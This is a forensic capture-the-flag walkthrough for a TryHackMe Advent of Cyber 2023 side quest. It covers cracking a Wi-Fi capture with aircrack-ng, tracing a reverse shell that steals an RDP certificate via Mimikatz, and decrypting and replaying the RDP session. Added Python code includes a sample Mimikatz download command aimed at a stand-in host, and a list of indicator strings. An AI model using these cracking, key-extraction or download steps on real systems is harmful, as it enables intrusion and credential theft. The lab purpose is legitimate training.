
Hello friend! Welcome to my writeup/walkthrough for TryHackMe’s Advent of Cyber 2023 Side Quest 1. For context, this event took place in December 2023 as part of TryHackMe’s Advent of Cyber 2023, where a new challenge is released each day, each covering a security topic that you can apply directly in a very in-depth lab environment.
Alongside this, four side quest challenges were released which featured more intense real-world applicable challenges with very minimal hand-holding. The hints and keys to these challenges are hidden throughout the main Advent of Cyber event, so you are required to complete the standard daily challenges in order to participate.
I have deliberately blurred most of the answers to the room so that you can follow along with the process rather than copy-and-paste your way to success. Please also note that there are several ways in which this room can be completed.
Phase 1 — The QR Code (OSINT)
To access the room, our first task is to find a QR code.
The QR code is divided into four parts, three of which were posted on a social media channel between Tuesday, 28th November and Thursday, 30th November, prior to the Advent of Cyber event. The first piece is given to us in Task 5 of the Advent of Cyber Side Quest room:

From the main Advent of Cyber 2023 room, we are given the social media channels which are in-scope for this challenge:

Searching through each for posts within the given timeline, we see the first part of the QR code was posted on the TryHackMe Discord at 2023-11-28 16:24:00 UTC:

The second comes from a post on LinkedIn by TryHackMe which contains a link to https://hubs.la/Q02bklp30:


The third and final part comes from a Tweet by @RealTryHackMe on 2023-11-30 11:19:00 UTC containing a link to https://hubs.la/Q02btlld0:


When put together, the final QR code redirects to the room — The Return of the Yeti:

Phase 2 — The Return of the Yeti
The challenge itself only provides a PCAP-NG (Packet Capture Next Generation) file that needs to be analysed.
Opening the file within Wireshark, we can immediately see this is a dump of beacon frames, with the SSID (Service Set Identifier), or name of the network, shown in the Info section:

As this is Wi-Fi traffic, its contents are encrypted and cannot be read directly. Fortunately, we can decrypt it with airdecap-ng once we know the password.
To obtain the Wi-Fi password, we can use aircrack-ng with our capture file and a wordlist (e.g., rockyou.txt), but first we must convert the PCAP-NG to a standard PCAP file, as this is the format aircrack-ng accepts. This can be done in Wireshark via File->Save As, selecting the Wireshark/tcpdump/… - pcap format:

$ aircrack-ng VanSpy.pcap -w /usr/share/wordlists/rockyou.txt

Using this password, we can decrypt the traffic:
$ airdecap-ng VanSpy.pcap -e <SSID> -p <PASSWORD>

Loading the output -dec.pcap file within Wireshark, we see that the first 20,000 packets relate to RDP traffic (port 3389). Following this, we see plaintext TCP traffic on port 4444, a port commonly used for reverse shells (packet 20560). Right-clicking on this packet and selecting Follow->TCP Stream, we can confirm this is an attacker retrieving a remote copy of Mimikatz and using it to steal keys located within the Administrator’s home directory:


From the above, we can see that the threat actor has been able to extract a PFX (Personal Information Exchange) file — also referred to as a PKCS #12 file. In this instance, this stores the user’s private key and corresponding X.509 digital certificate used for access, and can therefore be used to decrypt the RDP traffic we see at the beginning of the capture file.
LOCAL_MACHINE_Remote Desktop_0_INTERN-PF.pfx
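The "Follow TCP Stream" step above is easy to do by hand in Wireshark, but when triaging a large capture it helps to have the same logic scripted. The following is an added example (my own code, not part of the original room or of any tool it uses): it reads a classic pcap, reassembles each TCP conversation in both directions, and flags conversations that use an unusual port or carry a known string. The capture it parses is constructed inline, not VanSpy.pcap; the addresses, the port list and the indicator strings are assumptions chosen for the demonstration.

```python
"""Offline 'Follow TCP Stream' plus a simple flag for reverse-shell style sessions.
Added example for this writeup: the capture is constructed, not VanSpy.pcap."""
import struct
from collections import defaultdict

REVERSE_SHELL_PORTS = {4444}                      # assumption: ports worth a second look
INDICATORS = (b"mimikatz", b"Invoke-WebRequest")  # assumption: strings worth a second look
PCAP_MAGIC_LE = 0xA1B2C3D4


def make_frame(src_ip, dst_ip, sport, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame for the constructed capture (checksums left zero;
    the parser below does not validate them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split("."))) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip          # 14-byte Ethernet header, type IPv4


def build_pcap(frames):
    """Wrap frames in a classic (not pcapng) little-endian pcap, link type 1 = Ethernet."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_segments(data):
    """Yield (src, dst, sport, dport, seq, payload) for every TCP segment carrying data."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"                                     # same layout written big-endian
    else:
        raise ValueError("not a classic pcap (pcapng must be converted first)")
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack_from(end + "IIII", data, off)[2]
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                  # not IPv4 over Ethernet
        ip = frame[14:]
        if ip[9] != 6:
            continue                                  # not TCP
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20])),
                   sport, dport, seq, payload)


def follow_streams(data):
    """Group segments by endpoint pair (both directions in one stream), order each
    direction by sequence number and drop retransmitted duplicates."""
    per_direction = defaultdict(dict)
    for src, dst, sport, dport, seq, payload in tcp_segments(data):
        key = tuple(sorted([(src, sport), (dst, dport)]))
        per_direction[(key, (src, sport))].setdefault(seq, payload)
    streams = defaultdict(bytes)
    for (key, _), segs in per_direction.items():
        streams[key] += b"".join(segs[s] for s in sorted(segs))
    return dict(streams)


def flag_streams(streams):
    """Return [(endpoints, reasons)] for streams on a listed port or carrying an indicator."""
    findings = []
    for (a, b), payload in streams.items():
        reasons = []
        if a[1] in REVERSE_SHELL_PORTS or b[1] in REVERSE_SHELL_PORTS:
            reasons.append("port")
        hits = [i.decode() for i in INDICATORS if i.lower() in payload.lower()]
        if hits:
            reasons.append("indicators:" + ",".join(hits))
        if reasons:
            findings.append((f"{a[0]}:{a[1]} <-> {b[0]}:{b[1]}", reasons))
    return findings


def sample_pcap():
    """Constructed capture: one TLS-looking flow on 443 and one plaintext session on 4444
    fetching Mimikatz, mirroring what the real stream showed. Addresses are made up."""
    victim, c2 = "10.0.0.5", "203.0.113.7"
    cradle = b"Invoke-WebRequest -Uri http://203.0.113.7/mimikatz.exe -OutFile m.exe\r\n"
    return build_pcap([
        make_frame(victim, "198.51.100.9", 50001, 443, 1, b"\x16\x03\x01" + b"\x00" * 16),
        make_frame(victim, c2, 50002, 4444, 100, b"PS C:\\Users\\Administrator> "),
        make_frame(c2, victim, 4444, 50002, 500, cradle),
        make_frame(c2, victim, 4444, 50002, 500, cradle),   # retransmission, dropped
        make_frame(victim, c2, 50002, 4444, 127, b"PS C:\\Users\\Administrator> "),
    ])


if __name__ == "__main__":
    for endpoints, reasons in flag_streams(follow_streams(sample_pcap())):
        print(endpoints, reasons)
```

To run it against a real decrypted capture, replace `sample_pcap()` with `open("VanSpy-dec.pcap", "rb").read()` after the airdecap-ng step; the parser deliberately rejects pcapng so that the conversion step from earlier is not forgotten. Reassembly here concatenates one direction after the other rather than interleaving by time, which is enough for string matching but not for reproducing the exact on-screen order that Wireshark shows.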
As the PFX was sent Base64-encoded, we can decode it back into the original file:
# Assign encoded key to variable
$encodedKey = "<BASE64_STRING>"
# Decode key using Base64
$decodedKeyBytes = [System.Convert]::FromBase64String($encodedKey)
# Output bytes to file (Windows PowerShell 5.1; on PowerShell 7 use -AsByteStream instead of -Encoding Byte)
Set-Content -Path "decoded.pfx" -Value $decodedKeyBytes -Encoding Byte
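Before handing the decoded file to openssl it is worth confirming that the Base64 copied out of the TCP stream was complete: a stream boundary cut one line too early or too late produces a file that openssl rejects with an unhelpful error. The following is an added example (my own code, not from the room or from Mimikatz/openssl) that decodes the blob and checks the outer PKCS#12 structure from RFC 7292, a SEQUENCE whose first element is the INTEGER version 3. The blob it checks is a constructed stand-in with the same outer shape as a PFX, not a real key store.

```python
"""Decode an exfiltrated Base64 PFX blob and confirm it is a complete PKCS#12 structure.
Added example for this writeup; the sample blob is constructed, not the room's PFX."""
import base64
import binascii


def der_tlv(buf, off=0):
    """Parse one DER tag-length-value at buf[off:]; return (tag, value_start, value_end)."""
    if off + 2 > len(buf):
        raise ValueError("unexpected end of data")
    tag, first = buf[off], buf[off + 1]
    if first < 0x80:                                  # short form: length in one byte
        length, hdr = first, 2
    else:                                             # long form: 0x8N then N length bytes
        n = first & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized DER length (not valid DER)")
        length, hdr = int.from_bytes(buf[off + 2:off + 2 + n], "big"), 2 + n
    start, end = off + hdr, off + hdr + length
    if end > len(buf):
        raise ValueError(f"DER object claims {length} bytes but only {len(buf) - start} "
                         "remain: truncated capture or incomplete copy")
    return tag, start, end


def decode_pfx(b64_text):
    """Return the DER bytes of a PFX after checking Base64 cleanliness, outer SEQUENCE,
    absence of trailing junk, and version == 3 (RFC 7292 PFX structure)."""
    try:
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not clean Base64 (copy boundary wrong?): {exc}")
    tag, start, end = der_tlv(raw, 0)
    if tag != 0x30:
        raise ValueError("outer object is not a DER SEQUENCE, so not a PFX")
    if end != len(raw):
        raise ValueError(f"{len(raw) - end} trailing bytes after the PFX: stream cut too late")
    vtag, vstart, vend = der_tlv(raw, start)
    if vtag != 0x02 or raw[vstart:vend] != b"\x03":
        raise ValueError("PFX version field is not INTEGER 3")
    return raw


def verify_pfx(b64_text):
    """Wrap decode_pfx into (ok, message, der_or_None) for scripting."""
    try:
        raw = decode_pfx(b64_text)
    except ValueError as exc:
        return False, str(exc), None
    return True, f"complete PFX structure, {len(raw)} bytes", raw


def der_len(n):
    """Encode a DER length (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    if n < 0x100:
        return b"\x81" + bytes([n])
    return b"\x82" + n.to_bytes(2, "big")


def sample_blob(truncate=False):
    """Constructed stand-in: SEQUENCE { INTEGER 3, OCTET STRING of 200 zero bytes }.
    The padding forces the long-form length that a real PFX always uses."""
    body = b"\x02\x01\x03" + b"\x04" + der_len(200) + b"\x00" * 200
    der = b"\x30" + der_len(len(body)) + body
    if truncate:
        der = der[:-2]                                # simulate a cut-off stream
    return base64.b64encode(der).decode()


if __name__ == "__main__":
    ok, msg, raw = verify_pfx(sample_blob())
    print(msg)
    if ok:
        with open("decoded.pfx", "wb") as fh:         # same file name the next step uses
            fh.write(raw)
```

The check stops at the version field on purpose: the authSafe and MAC that follow are what openssl validates with the password, so there is no need to reimplement them here. A failure from `der_tlv` with "truncated" in the message means more of the stream needs to be copied; a trailing-bytes failure means the copy ran into the next command's output.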
Now, using openssl and our decoded key, we can convert the PFX file to PEM format and derive the private key. Note that the default password used to extract this key is mimikatz [1].
# Import password for the PFX is "mimikatz" [1]; -passin supplies it non-interactively
$ openssl pkcs12 -in decoded.pfx -nocerts -out private_key.pem -nodes -passin pass:mimikatz
$ openssl rsa -in private_key.pem -out private.key
Using this private key, we can now decrypt the RDP / TPKT packets. Within Wireshark, go to Edit->Preferences->Protocols->TLS->Edit, select Edit… within RSA keys list and add the information shown below [2]:

With this decrypted capture, we can use File->Export PDU, selecting OSI Layer 7 which is where RDP resides, to extract the RDP packets.
There are two main ways to get the rest of the flags for the room — 1) filter through the RDP traffic via Wireshark or 2) replay the RDP session. In this instance, we will opt for (2) and we will use PyRDP to replay the RDP session.
The installation of this tool can be very messy, so I recommend following PentestTools’ guide which will install the tool within a Python virtual environment.
Once inside the virtual environment with the tool installed, we first have to convert our RDP capture (.PCAP) to a .PYRDP file via pyrdp-convert:
$ pyrdp-convert VanSpy-rdp.pcap -o .
We can then use pyrdp-replay to replay the RDP session and retrieve the case number and contents of yetikey1.txt:
# If error occurs, install pyside6
$ pip3 install pyside6
$ pyrdp-replay <PYRDP_FILE>


Conclusion
Overall, this was a really interesting challenge that showcases how Wireshark can be used in a more realistic context, with filtering for specific protocols, importing keys to decrypt traffic, and exporting a specific protocol for use elsewhere.
As stated previously, there are numerous ways in which this room can be solved and I would highly recommend you seek out additional writeups and review the references to expand your knowledge!
I hope you enjoyed!
References
[2] — Palo Alto Networks: Wireshark Tutorial: Decrypting RDP Traffic
